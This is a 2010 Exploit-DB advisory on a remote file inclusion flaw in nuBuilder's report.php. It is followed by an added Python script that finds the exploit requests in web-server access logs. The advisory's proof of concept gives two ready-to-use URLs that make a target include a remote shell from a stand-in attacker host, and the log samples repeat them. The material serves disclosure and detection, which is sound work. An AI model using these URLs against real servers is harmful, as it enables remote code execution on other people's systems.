nuBuilder – Remote File Inclusion

  • Author: Ahlspiess
    Date: 2010-07-28
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/14490/
  • Software: nuBuilder 10.04.x and lower (maybe)?
    Type: Remote File Inclusion
    Download: http://sourceforge.net/projects/nubuilder/files/
    Author: Ahlspiess
    Email: ahlspiess@tbdsecurity.com
    
    Vulnerable file: report.php
    
    report.php file content:

    <?php
    /*
    ** File: report.php
    ** Author: nuSoftware
    ** Created: 2007/04/26
    ** Last modified: 2009/07/15
    **
    ** Copyright 2004, 2005, 2006, 2007, 2008, 2009 nuSoftware
    **
    ** This file is part of the nuBuilder source package and is licensed under the
    ** GPLv3. For support on developing in nuBuilder, please visit the nuBuilder
    ** wiki and forums. For details on contributing a patch for nuBuilder, please
    ** visit the `Project Contributions' forum.
    **
    ** Website: http://www.nubuilder.com
    ** Wiki: http://wiki.nubuilder.com
    ** Forums: http://forums.nubuilder.com
    */

    include($GLOBALS['StartingDirectory']."/database.php"); // <== interesting huh?
    
    POC
    Successfully tested against PHP configurations with register_globals = On and Off, and allow_url_include = On.
    
    register_globals = Off
    http://site.tld/report.php?StartingDirectory=http://attacker.tld/shell.txt?
    
    register_globals = On
    http://site.tld/report.php?GLOBALS[StartingDirectory]=http://attacker.tld/shell.txt?
    
    
    #EOF
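
For defenders, the two request forms above can be looked for in web-server access logs. The Python below is an added example, not part of the original advisory or of nuBuilder; the combined log format, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Parameter names taken from the advisory's two request forms.
PARAMS = {"StartingDirectory", "GLOBALS[StartingDirectory]"}
# Values starting with a stream-wrapper scheme (http://, ftp://, php://, data:),
# "//" or a UNC prefix are never a legitimate include base directory.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]+:|//|\\\\)", re.I)
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return [(name, value)] when a report.php request overrides the include base."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/report.php"):
        return []
    # parse_qsl percent-decodes names and values, so GLOBALS%5B...%5D matches too.
    return [(name, value)
            for name, value in parse_qsl(parts.query, keep_blank_values=True)
            if name in PARAMS and REMOTE.match(value)]

def scan(lines):
    """Return [(line_number, name, value)] for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            hits += [(number, n, v) for n, v in suspicious_params(match.group(1))]
    return hits

# Constructed sample log lines (hosts are the advisory's placeholders).
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Jul/2010:10:00:01 +0000] "GET /report.php?StartingDirectory=http://attacker.tld/shell.txt? HTTP/1.1" 200 512',
    '203.0.113.5 - - [28/Jul/2010:10:00:02 +0000] "GET /nu/report.php?GLOBALS%5BStartingDirectory%5D=http%3A%2F%2Fattacker.tld%2Fshell.txt%3F HTTP/1.1" 200 512',
    '198.51.100.7 - - [28/Jul/2010:10:00:03 +0000] "GET /report.php?reportID=42 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [28/Jul/2010:10:00:04 +0000] "GET /index.php?StartingDirectory=/var/www HTTP/1.1" 200 128',
]

if __name__ == "__main__":
    for number, name, value in scan(SAMPLE_LOG):
        print(f"line {number}: {name} = {value!r}")
```

A match shows only that a request tried to set the include base; whether the remote file was fetched depends on allow_url_include, which the advisory's test setup had set to On.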